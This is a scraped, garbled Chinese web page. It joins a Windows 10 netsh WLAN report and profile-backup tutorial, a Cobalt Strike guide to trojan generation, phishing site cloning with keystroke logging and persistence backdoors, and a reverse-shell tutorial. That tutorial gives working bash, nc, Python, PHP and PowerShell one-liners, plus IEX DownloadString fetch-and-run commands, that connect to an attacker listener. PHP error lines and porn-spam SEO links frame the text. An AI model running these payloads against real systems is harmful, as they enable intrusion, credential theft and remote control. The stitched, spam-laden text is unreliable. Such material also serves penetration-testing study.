Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 日韩成人在线播放,国产日本欧美在线观看乱码,在线观看一区

          整合營(yíng)銷服務(wù)商

          電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理

          免費(fèi)咨詢熱線:

          教你如何在Win10中生成無線網(wǎng)絡(luò)報(bào)告

          Windows 10中,你可以通過netsh命令來生成無線網(wǎng)絡(luò)報(bào)告。如果你正飽受WLAN連接問題的困擾,那么分析無線網(wǎng)絡(luò)報(bào)告將有助于你定位問題并有針對(duì)性地解決問題。若你的WLAN連接沒有問題,那么了解你的計(jì)算機(jī)關(guān)于WLAN連接的情況的細(xì)節(jié)也未嘗不是一種有趣的體驗(yàn)。

          在這篇文章中,IT之家將教大家如何生成無線網(wǎng)絡(luò)報(bào)告以及列舉無線網(wǎng)絡(luò)報(bào)告中的關(guān)鍵信息。

          在Windows 10中生成無線網(wǎng)絡(luò)報(bào)告

          在Windows 10中生成無線網(wǎng)絡(luò)報(bào)告的方法十分簡(jiǎn)單,我們只需要執(zhí)行一行命令。

          我們可以通過Windows Powershell(推薦)或者命令提示符以管理員身份來執(zhí)行用于生成無線網(wǎng)絡(luò)報(bào)告的命令。

          要在你的計(jì)算機(jī)中找到并以管理員身份運(yùn)行Windows Powershell,請(qǐng)將鼠標(biāo)光標(biāo)移至開始按鈕(默認(rèn)位于你計(jì)算機(jī)屏幕的左下角)上,單擊鼠標(biāo)右鍵,在彈出的菜單中選中“Windows Powershell(管理員)”,并以鼠標(biāo)左鍵單擊。

          要在你的計(jì)算機(jī)中找到并以管理員身份運(yùn)行命令提示符,請(qǐng)以鼠標(biāo)左鍵單擊微軟小娜的搜索框,輸入并搜索關(guān)鍵字“CMD”,在搜索結(jié)果的“最佳匹配”項(xiàng)下,你可以找到命令提示符的入口。將鼠標(biāo)光標(biāo)置于命令提示符的圖標(biāo)上,單擊鼠標(biāo)右鍵,在彈出的菜單中選中“以管理員身份運(yùn)行”,并以鼠標(biāo)左鍵單擊。

          在接下來的教程中,我們將以在Windows Powershell中演示執(zhí)行用于生成無線網(wǎng)絡(luò)報(bào)告的命令的過程。

          在Windows Powershell中輸入(或粘貼)并執(zhí)行以下命令:

          netsh wlan show wlanreport

          如果一切順利,你將看到執(zhí)行結(jié)果如下:

          通過Windows Powershell中顯示的命令結(jié)果可知,最終生成的無線網(wǎng)絡(luò)報(bào)告已經(jīng)被命名為“wlan-report-latest.html”并保存在以下目錄下:

          C:\ProgramData\Microsoft\Windows\WlanReport\

          如果你的Windows 10安裝在其他盤符,那么你可以在文件資源管理器的地址欄中輸入以下地址:

          %ProgramData%\Microsoft\Windows\WlanReport

          并按鍵盤上的回車鍵來導(dǎo)航到無線網(wǎng)絡(luò)報(bào)告被保存到的位置。

          你可以使用任意的網(wǎng)頁瀏覽器來打開無線網(wǎng)絡(luò)報(bào)告,其中的內(nèi)容(局部)將如下圖所示:

          接下來我們來看無線網(wǎng)絡(luò)報(bào)告中的關(guān)鍵信息。

          無線網(wǎng)絡(luò)報(bào)告中的關(guān)鍵信息

          WLAN摘要圖表

          WLAN摘要圖表將以可視化圖表的形式顯示報(bào)告中的WLAN連接會(huì)話信息。它的縱軸分別為WLAN、NCSI和NDIS項(xiàng),橫軸則是時(shí)間線,在WLAN摘要圖表中,你最需要關(guān)注的關(guān)鍵信息是錯(cuò)誤信息,若時(shí)間線中出現(xiàn)紅色的中間帶有“X”標(biāo)志的圓點(diǎn),則表明當(dāng)前(時(shí)間軸所處的)時(shí)間該點(diǎn)所在的項(xiàng)發(fā)生了錯(cuò)誤。點(diǎn)擊表示某項(xiàng)發(fā)生了錯(cuò)誤的點(diǎn)則可以查看該條錯(cuò)誤所對(duì)應(yīng)的與WLAN會(huì)話相關(guān)聯(lián)事件。

          報(bào)告信息

          報(bào)告信息(Report Info)包含兩條關(guān)鍵信息,分別是無線網(wǎng)絡(luò)報(bào)告生成的時(shí)間(比如2018年01月17日14:34:16)和該報(bào)告包含的內(nèi)容橫跨了多長(zhǎng)時(shí)間(比如三天)。

          一般系統(tǒng)信息

          一般系統(tǒng)信息(General System Info)所包含的關(guān)鍵信息包括計(jì)算機(jī)名稱(比如ThinkCentre)、計(jì)算機(jī)制造商(比如聯(lián)想)、計(jì)算機(jī)型號(hào)(比如揚(yáng)天S710)、BIOS日期/版本(比如2013年05月16日/FJKT16AUS)、操作系統(tǒng)版本(比如17074.1000)以及你的系統(tǒng)是否加入了MDM。

          用戶信息

          用戶信息(User Info)主要包含三條關(guān)鍵信息,分別是用戶名(比如Lenovo)、用戶域(比如THINKCENTRE)和用戶DNS域(比如未知)。

          網(wǎng)絡(luò)適配器

          網(wǎng)絡(luò)適配器(Network Adapters)包含的關(guān)鍵信息有設(shè)備名(比如WAN Miniport (PPPOE))、即插即用ID(比如SWD\MSRRAS\MS_PPPOEMINIPORT)、GUID(比如{DC4D342D-BE68-41F3-8119-A0C9C7D1A164})、當(dāng)前驅(qū)動(dòng)程序的版本(比如10.0.17074.1000)、驅(qū)動(dòng)程序日期(比如6-21-2006)DevNode標(biāo)志(比如0x180200a)等。

          如果你的計(jì)算機(jī)的網(wǎng)絡(luò)適配器有問題,那么該網(wǎng)絡(luò)適配器的問題編號(hào)將列于網(wǎng)絡(luò)適配器的關(guān)鍵信息列表中。

          腳本輸出

          腳本輸出(Script Output)中主要包含三條命令(腳本)的執(zhí)行結(jié)果,下面我們一一列舉。

          ipconfig /all

          ipcpnfig /all腳本的執(zhí)行結(jié)果中包含的關(guān)鍵信息有當(dāng)前計(jì)算機(jī)中網(wǎng)絡(luò)適配器的MAC地址、IP地址和DNS服務(wù)器(若適用)等。

          netsh wlan show all

          netsh wlan show all腳本的執(zhí)行結(jié)果中包含的關(guān)鍵信息是當(dāng)前計(jì)算機(jī)中網(wǎng)絡(luò)適配器的詳情,包括適配器型號(hào)、適配器制造商、驅(qū)動(dòng)程序日期/版本、計(jì)算機(jī)中的WLAN配置文件、報(bào)告生成的過程中發(fā)現(xiàn)的WLAN網(wǎng)絡(luò)列表等。

          certutil -store -silent My & certutil -store -silent -user My

          certutil -store -silent My & certutil -store -silent -user My腳本的執(zhí)行結(jié)果包含的關(guān)鍵信息是當(dāng)前的計(jì)算機(jī)所安裝的證書的列表。

          配置文件輸出

          配置文件輸出的執(zhí)行結(jié)果中所包含的關(guān)鍵信息為當(dāng)前計(jì)算機(jī)中所有WLAN網(wǎng)絡(luò)的配置文件,WLAN網(wǎng)絡(luò)的密碼已經(jīng)經(jīng)過加密,不會(huì)以明文顯示。

          摘要

          摘要(Summary)中包含的關(guān)鍵信息有會(huì)話的成功/失敗情況(比如2次成功、0次失敗、0次警告)、斷開連接的原因(比如用戶主動(dòng)斷開連接)、會(huì)話的持續(xù)時(shí)間(比如360分鐘以上)、無線會(huì)話(與每個(gè)WLAN會(huì)話相關(guān)聯(lián)的所有WLAN事件,該列表中被設(shè)置了彩色背景的事件可與前文提到的WLAN摘要列表中的彩色的點(diǎn)相對(duì)應(yīng))等。

          以上是在Windows 10中生成無線網(wǎng)絡(luò)報(bào)告的方法和無線網(wǎng)絡(luò)報(bào)告中所包含的關(guān)鍵信息。

          無線網(wǎng)絡(luò)報(bào)告是借由netsh命令生成的,事實(shí)上,netsh命令還可以用來做更多的事情。

          使用netsh命令來備份和恢復(fù)無線網(wǎng)絡(luò)配置文件

          無線網(wǎng)絡(luò)備份文件中包含的信息有無線網(wǎng)絡(luò)的SSID信息以及密碼信息。當(dāng)你的計(jì)算機(jī)重新安裝了操作系統(tǒng)時(shí),你可以借由無線網(wǎng)絡(luò)的備份文件快速地恢復(fù)無線網(wǎng)絡(luò)配置,這將有助于節(jié)省手動(dòng)輸入無線網(wǎng)絡(luò)密碼的時(shí)間或者等待無線網(wǎng)絡(luò)配置文件從云端恢復(fù)到本地計(jì)算機(jī)的時(shí)間。

          要備份與恢復(fù)無線網(wǎng)絡(luò)配置文件十分簡(jiǎn)單,以小編的計(jì)算機(jī)為例,在開始備份無線網(wǎng)絡(luò)配置文件之前,我們最好先來查看當(dāng)前的計(jì)算機(jī)中存儲(chǔ)了哪些無線網(wǎng)絡(luò)配置文件。要查看當(dāng)前計(jì)算機(jī)中存儲(chǔ)的無線網(wǎng)絡(luò)配置文件,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令:

          netsh wlan show profiles

          無線網(wǎng)絡(luò)配置文件列表將顯示如下:

          要一次性備份當(dāng)前列表中所顯示的所有的無線網(wǎng)絡(luò)的配置文件,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令(以將無線網(wǎng)絡(luò)備份文件生成到E盤根目錄為例):

          netsh wlan export profile key=clear folder=E:\

          命令的執(zhí)行結(jié)果將如圖所示:

          這時(shí),我們打開文件資源管理器,定位到E盤根目錄,將看到無線網(wǎng)絡(luò)配置文件備份如下:

          若要備份指定無線網(wǎng)絡(luò)的配置文件(以備份無線網(wǎng)絡(luò)“Ruanmei”的配置文件為例),我們只需在WIndows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令(以將無線網(wǎng)絡(luò)備份文件生成到E盤根目錄為例):

          netsh wlan export profile "Ruanmei" key=clear folder=E:\

          命令的執(zhí)行結(jié)果將如圖所示:

          若要借由備份文件恢復(fù)無線網(wǎng)絡(luò)配置到當(dāng)前用戶,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令(以恢復(fù)E盤根目錄中的無線網(wǎng)絡(luò)“Ruanmei”的配置文件“Wi-Fi-Ruanmei.xml”為例):

          netsh wlan add profile filename="E:\Wi-Fi-Ruanmei.xml" user=current

          命令的執(zhí)行結(jié)果將如圖所示:

          若要借由備份文件恢復(fù)無線網(wǎng)絡(luò)配置到全部用戶,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令(以恢復(fù)E盤根目錄中的無線網(wǎng)絡(luò)“Ruanmei”的配置文件“Wi-Fi-Ruanmei.xml”為例):

          netsh wlan add profile filename="E:\Wi-Fi-Ruanmei.xml" user=all

          命令的執(zhí)行結(jié)果將如圖所示:

          使用netsh命令來過濾無線網(wǎng)絡(luò)列表

          若當(dāng)前地點(diǎn)有很多備選的無線網(wǎng)絡(luò),那么整個(gè)無線網(wǎng)絡(luò)列表看起來會(huì)非常雜亂。通過netsh命令,我們可以把列表中的指定無線網(wǎng)絡(luò)加入“白名單(只在無線網(wǎng)絡(luò)列表中顯示白名單中的無線網(wǎng)絡(luò))里”。

          要將無線網(wǎng)絡(luò)(比如Ruanmei)加入到無線網(wǎng)絡(luò)列表的白名單,我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令:

          netsh wlan add filter permission=allow ssid="Ruanmei" networktype=infrastructure

          執(zhí)行結(jié)果將如下圖所示:

          然后,我們?cè)賵?zhí)行以下命令來阻止白名單之外的無線網(wǎng)絡(luò)顯示在列表里:

          netsh wlan add filter permission=denyall networktype=infrastructure

          執(zhí)行結(jié)果將如下圖所示:

          以下是執(zhí)行以上兩條命令前后的無線網(wǎng)絡(luò)列表對(duì)比:

          執(zhí)行前

          執(zhí)行后

          若要還原無線網(wǎng)絡(luò)列表設(shè)置到此前的狀態(tài)(在無線網(wǎng)絡(luò)列表中顯示所有備選的無線網(wǎng)絡(luò)),我們只需在Windows Powershell(推薦)或命令提示符中輸入(或粘貼)并執(zhí)行以下命令:

          netsh wlan delete filter permission=denyall networktype=infrastructure

          執(zhí)行結(jié)果將如下圖所示:

          以下是執(zhí)行以上命令前后的無線網(wǎng)絡(luò)列表對(duì)比:

          執(zhí)行前

          執(zhí)行后

          好的,以上就是本期IT之家極客學(xué)院的全部?jī)?nèi)容,開開心心地玩兒去吧~

          想看到更多這類內(nèi)容?去APP商店搜IT之家,天天都有小歡喜。

          、CobaltStrike簡(jiǎn)介

          Cobalt Strike是一款基于java的內(nèi)網(wǎng)滲透測(cè)試神器,常被業(yè)界人稱為CS神器。自3.0以后已經(jīng)不在使用Metasploit框架而作為一個(gè)獨(dú)立的平臺(tái)使用,分為客戶端與服務(wù)端,服務(wù)端是一個(gè),客戶端可以有多個(gè),非常適合團(tuán)隊(duì)協(xié)同作戰(zhàn),多個(gè)攻擊者可以同時(shí)連接到一個(gè)團(tuán)隊(duì)服務(wù)器上,共享攻擊資源與目標(biāo)信息和sessions,可模擬APT做模擬對(duì)抗,進(jìn)行內(nèi)網(wǎng)滲透。 Cobalt Strike集成了端口轉(zhuǎn)發(fā)、服務(wù)掃描,socket代理,多模式端口監(jiān)聽,win exe木馬生成,win dll木馬生成,java木馬生成,office宏病毒生成,木馬捆綁;釣魚攻擊包括:站點(diǎn)克隆,目標(biāo)信息獲取,java執(zhí)行,瀏覽器自動(dòng)攻擊等等。

          1.1服務(wù)端

          團(tuán)隊(duì)服務(wù)器最好運(yùn)行在Linux平臺(tái)上,服務(wù)端的關(guān)鍵文件是teamserver和cobaltstrike.jar,將這兩個(gè)文件放在同一目錄下運(yùn)行:

          團(tuán)隊(duì)服務(wù)器默認(rèn)連接端口為50050,如果你想修改端口只需修改teamserver文件。

          1.2客戶端

          Linux:./cobaltstrike或 java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

          Windows:雙擊cobaltstrike.exe

          二、生成木馬

          2.1創(chuàng)建監(jiān)聽器

          點(diǎn)擊Cobalt Strike -> Listeners->Add,其中內(nèi)置了八種監(jiān)聽器。

          其中windows/beacon為內(nèi)置監(jiān)聽器,包括dns、http、https、smb、tcp、extc2六種方式的監(jiān)聽器;windows/foreign為外部監(jiān)聽器,配合Metasploit或者Armitage的監(jiān)聽器。

          2.2hta文件木馬

          hta木馬是 http application的縮寫是一種獨(dú)立的程序跟c++寫的程序沒啥區(qū)別。可以被windows電腦的mshta命令直接執(zhí)行。可更改任意后綴名。點(diǎn)Attacks->Packages->HTML Application,選擇對(duì)應(yīng)的監(jiān)聽器,選擇powershell即可生成。

          目標(biāo)主機(jī)訪問到木馬文件并執(zhí)行,返回CS就可以看到受害者上線。

          目標(biāo)主機(jī)使用dos命令訪問到木馬文件并執(zhí)行,返回CS就可以看到受害者上線。

          2.3EXE文件木馬

          點(diǎn)擊Attacks->Packages->Windows Executable,選擇對(duì)應(yīng)的監(jiān)聽器,這里可生成(PowerShell,Raw,Windows EXE,Windows DLL(32-bit),Windows DLL(64-bit))選擇Windows EXE,點(diǎn)擊Generate生成,選擇生成的路徑及文件名保存即可。

          將生成的exe文件投遞到目標(biāo)主機(jī),目標(biāo)主機(jī)運(yùn)行。

          2.4DLL文件木馬

          DLL是編譯好的代碼,與一般程序沒什么大差別,只是它不能獨(dú)立運(yùn)行,需要程序調(diào)用。DLL的代碼和其他程序幾乎沒什么兩樣,僅僅是接口和啟動(dòng)模式不同,只要改動(dòng)一下代碼入口,DLL就變成一個(gè)獨(dú)立的程序。

          將生成的dll文件投遞到目標(biāo)主機(jī),目標(biāo)主機(jī)運(yùn)行。

          DLL文件下載過程中對(duì)應(yīng)數(shù)據(jù)包

          2.5shellcode

          CS可以生成很多類型的shellcode,如c、c#、java、python、powershell、ruby、raw等

          點(diǎn)擊Attacks->package->paylaod generator 這里以powershell為例。將生成的payload.ps1復(fù)制到目標(biāo)系統(tǒng)并執(zhí)行以

          三、SOCKS4代理

          3.1SOCKS概念

          目前利用網(wǎng)絡(luò)防火墻將組織內(nèi)部的網(wǎng)絡(luò)結(jié)構(gòu)與外部網(wǎng)絡(luò)如 INTERNET 中有效地隔離開來,這種方法正變得逐漸流行起來。這些防火墻系統(tǒng)通常以應(yīng)用層網(wǎng)關(guān)的形式工作在網(wǎng)絡(luò)之間,提供受控的 TELNET 、 FTP 、 SMTP 等的接入。SOCKS 提供一個(gè)通用框架來使這些協(xié)議安全透明地穿過防火墻。 說的簡(jiǎn)單明了一點(diǎn),在滲透測(cè)試中,我們使用socks技術(shù),可以穿透進(jìn)入目標(biāo)機(jī)的內(nèi)網(wǎng),從而擴(kuò)大我們的戰(zhàn)果

          CobaltStrike自帶Socks功能,開啟Socks server 配置一個(gè)代理端口,成功開啟socks4后,即可 成功進(jìn)入目標(biāo)內(nèi)網(wǎng)。

          3.2socks4代理

          開啟socks4代理,通過代理進(jìn)行內(nèi)網(wǎng)滲透 開啟socks,可以通過命令,也可以通過右鍵Pivoting->SOCKS Server

          修改vim /etc/proxychains.conf ,在文件末尾添加socks4代理服務(wù)器

          使用proxychains代理掃描內(nèi)網(wǎng)主機(jī)

          3.3內(nèi)網(wǎng)掃描

          我們還可以通過隧道將整個(gè)msf帶進(jìn)目標(biāo)內(nèi)網(wǎng) 點(diǎn)擊View->Proxy Pivots,選擇Socks4a Proxy,點(diǎn)擊Tunnel:


          四、Cobalt Strike與Metasploit聯(lián)動(dòng)

          4.1msf開啟接聽模式

          創(chuàng)建兩個(gè)監(jiān)聽器,一個(gè)使用windows/beacon_http/reverse_http來監(jiān)聽肉雞,另一個(gè)使用windows/foreign/reverse_http來將獲取到的控制權(quán)傳給msf(注意:這里的端口要與msf監(jiān)聽的端口一致)。

          4.2生成鏈接

          利用HTML Application來生成鏈接使得目標(biāo)設(shè)備上線,右擊選擇spwan,選擇msf監(jiān)聽器,點(diǎn)擊Choose,返回msf查看,成功獲取meterpreter會(huì)話(此方法獲取到的會(huì)話并不穩(wěn)定。)

          4.3Metasploit生成木馬,CS發(fā)布

          五、釣魚攻擊

          5.1網(wǎng)站克隆

          點(diǎn)擊Attacks->Web Driver-by->Clone site,輸入想要克隆的網(wǎng)址,這里需要勾選上Log keystrokes來記錄輸入

          當(dāng)受害者輸入了用戶名密碼,CS在日志里會(huì)有記錄

          5.2網(wǎng)站跳轉(zhuǎn)

          我們發(fā)現(xiàn)即使受害者輸入正確的賬號(hào)密碼系統(tǒng)也會(huì)提示用戶名密碼錯(cuò)誤,然后會(huì)自動(dòng)跳轉(zhuǎn)到正確的登錄界面,事實(shí)上我們還可以實(shí)現(xiàn)主動(dòng)跳轉(zhuǎn)到任意界面。 為了防止沒有主動(dòng)跳轉(zhuǎn)到正確的頁面我們可以選擇主動(dòng)跳轉(zhuǎn)到正確頁面 點(diǎn)擊 Attacks->Web Driver-by->System Profiler

          六、提權(quán)

          6.1導(dǎo)入cna文件

          點(diǎn)擊Cobalt Strike->Script Manager來導(dǎo)入elevate.cna 文件

          選中目標(biāo)機(jī)器右擊選擇Access->Elevate,選擇相應(yīng)的漏洞即可提權(quán)

          七、權(quán)限維持

          7.1服務(wù)后門

          打開beacon shell并執(zhí)行命令

          查看受害機(jī)器服務(wù),發(fā)現(xiàn)名為name的服務(wù)項(xiàng)創(chuàng)建成功

          7.2修改啟動(dòng)類型

          不過此時(shí)該服務(wù)啟動(dòng)類型為手動(dòng),我們需要將其設(shè)置為自動(dòng)

          這樣一個(gè)service后門就設(shè)置成功了,即使目標(biāo)機(jī)器重啟后依舊可以拿到控制權(quán)限。

          7.3注冊(cè)表后門

          打開beacon shell并執(zhí)行命令

          這樣一個(gè)注冊(cè)表自啟動(dòng)后門已經(jīng)設(shè)置成功了

          么是反彈shell?

          通常我們對(duì)一個(gè)開啟了80端口的服務(wù)器進(jìn)行訪問時(shí),就會(huì)建立起與服務(wù)器Web服務(wù)鏈接,從而獲取到服務(wù)器相應(yīng)的Web服務(wù)。而反彈shell是我們開啟一個(gè)端口進(jìn)行監(jiān)聽,轉(zhuǎn)而讓服務(wù)器主動(dòng)反彈一個(gè)shell來連接我們的主機(jī),我們?cè)偻ㄟ^接收到的shell進(jìn)而來遠(yuǎn)程控制服務(wù)器。

          什么是Netcat?為什么選擇Netcat?

          Netcat由于他體積小且功能強(qiáng)大的特性,常常使用者被稱為“瑞士軍刀”或者ncat,在Debian、Mac系統(tǒng)中是默認(rèn)安裝的。想要在兩臺(tái)機(jī)器之間進(jìn)行正向、反向連接,Netcat通常是不二之選,反彈shell的使用中常用參數(shù)包括:

          • -e filename 程序重定向
          • -l 監(jiān)聽接收信息
          • -n 以數(shù)字形式表示的IP地址
          • -p port 本地端口
          • -u UDP模式
          • -v 顯示詳細(xì)信息 (-vv能顯示更加詳細(xì)的消息)

          關(guān)于Netcatd的更多使用方法可參考:

          https://www.freebuf.com/sectool/168661.html


          Linux系統(tǒng)中常見的反彈shell

          實(shí)驗(yàn)環(huán)境:

          Kali:192.168.178.131

          CentOS 7:192.168.178.218


          方法一:利用Linux命令

          #反彈命令:

          bash -i >/dev/tcp/192.168.178.131/23333 0>&1 2>&1

          在系統(tǒng)文件中是不存在/dev/tcp這個(gè)文件的,它是一個(gè)特殊文件,打開這個(gè)文件就類似于發(fā)出了一個(gè)socket調(diào)用,建立一個(gè)socket連接,讀寫這個(gè)文件就相當(dāng)于在這個(gè)socket連接中傳輸數(shù)據(jù)。同理/dev/udp就是通過udp來進(jìn)行傳輸。

          #Kali進(jìn)行監(jiān)聽:

          nc -lvp 23333

          方法二:利用nc命令

          #反彈命令:

          nc -e /bin/bash 192.168.178.131 23333

          (利用了nc的重定向功能)

          #Kali進(jìn)行監(jiān)聽:

          nc -lvp 23333

          方法三:利用腳本

          1. Python

          #反彈命令:

          python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.178.131',23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

          #Kali進(jìn)行監(jiān)聽:

          nc -lvp 23333

          2. php

          (前提:需要在php.ini中放開危險(xiǎn)函數(shù)system,exec。可以通過php --ini來查詢php配置文件路徑,然后刪除配置文件中“disable_funtions”變量中對(duì)應(yīng)的函數(shù)名即可。)

          (1) 反彈命令(代碼假設(shè)TCP連接的文件描述符為4,如果不行可以換成5或6):

          php -r '$sock=fsockopen("192.168.178.131",23333);system("/bin/bash -i <&4 >&4 2>&4");'

          #Kali進(jìn)行監(jiān)聽:

          nc -lvp 23333

          (2) 反彈命令:

          php -r ‘exec(“/bin/bash -i >& /dev/tcp/192.168.178.131/23333”);’

          #Kali進(jìn)行監(jiān)聽:

          nc -lvp 23333


          Windows系統(tǒng)常見反彈命令

          實(shí)驗(yàn)環(huán)境:

          Kali:192.168.178.131

          Windows server 2008:192.168.178.128


          方法一:利用”nishang”攻擊框架

          Nishang(https://github.com/samratashok/nishang )是一個(gè)基于PowerShell的攻擊框架,集合了一些PowerShell攻擊腳本和有效載荷,可反彈TCP/ UDP/ HTTP/HTTPS/ ICMP等類型shell。

          1. 利用UDP反彈命令:

          powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.178.131 -port 23333

          #Kali進(jìn)行監(jiān)聽:

          nc -lup 23333

          2. 利用TCP反彈命令:

          powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.178.131 -port 23333

          #Kali進(jìn)行監(jiān)聽:

          nc -lvp 23333

          方法二:利用powercat

          powercat(https://github.com/besimorhino/powercat)為Powershell版的Netcat,實(shí)際上是一個(gè)powershell的函數(shù),使用方法類似Netcat。

          #反彈命令:

          powershell IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.178.131 -p 23333 -e cmd

          #Kali進(jìn)行監(jiān)聽:

          nc -lvp 23333

          方法三:自定義powershell函數(shù)

          #反彈命令:

          powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.178.131',23333);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

          #Kali進(jìn)行監(jiān)聽:

          nc -lvp 23333


          方法四:利用metasploit

          利用metasploit的web_delivery模塊可通過python、php、powershell、regsvr32等進(jìn)行反彈shell。

          #以powershell進(jìn)行反彈為例,kali執(zhí)行命令,可以看到生成已經(jīng)過編碼的payload:

          msfconsole

          use exploit/multi/script/web_delivery

          set payload windows/meterpreter/reverse_tcp

          set target 2

          set LPORT 23333

          set LHOST 192.168.178.131

          Set srvhost 0.0.0.0

          Set srvpost 8080

          run

          #Win server 2008執(zhí)行生成的命令“powershell.exe -nop -w hidden -e ......”(-w hidden參數(shù)使命令運(yùn)行時(shí)窗口隱藏)。

          #Kali接收到反彈:

          以上提到的是常見的反彈shell方式,當(dāng)然,還存在更多的其他方式,github上也有很多成熟的攻擊框架可以實(shí)現(xiàn)反彈shell,例如PowerSploit、Empire、Dnscat等等,感興趣可以繼續(xù)進(jìn)行深入學(xué)習(xí)。


          主站蜘蛛池模板: 中文字幕无码一区二区三区本日| 国产主播福利一区二区| 高清一区二区三区免费视频| 成人中文字幕一区二区三区| 国模视频一区二区| 精品一区二区三区中文| 亚洲熟妇AV一区二区三区浪潮| 日本道免费精品一区二区| 国产福利一区视频| 日韩在线视频一区二区三区| 78成人精品电影在线播放日韩精品电影一区亚洲| 国产拳头交一区二区| 日韩视频在线一区| 免费高清av一区二区三区| 精品无码国产一区二区三区51安 | 中文无码AV一区二区三区| 亚洲av成人一区二区三区观看在线| 无码av免费一区二区三区| 国产亚洲一区二区精品| 亚洲综合色自拍一区| 一区二区三区免费视频网站| aⅴ一区二区三区无卡无码| 无码毛片一区二区三区中文字幕 | 久久精品无码一区二区日韩AV| 视频在线观看一区二区三区| 国产福利电影一区二区三区,日韩伦理电影在线福 | 亚洲综合av一区二区三区不卡| 制服丝袜一区在线| 国产精品视频一区二区三区| 国产一区二区三区乱码在线观看| 色噜噜狠狠一区二区三区| 亚洲字幕AV一区二区三区四区| 亚洲一区二区无码偷拍| 午夜性色一区二区三区不卡视频| 国产精品乱码一区二区三| 日韩精品一区二区三区在线观看l| 韩国一区二区三区视频| 日韩精品一区二区三区中文字幕| 亚洲第一区精品观看| 亚洲一区二区三区影院| 精品无码国产一区二区三区AV|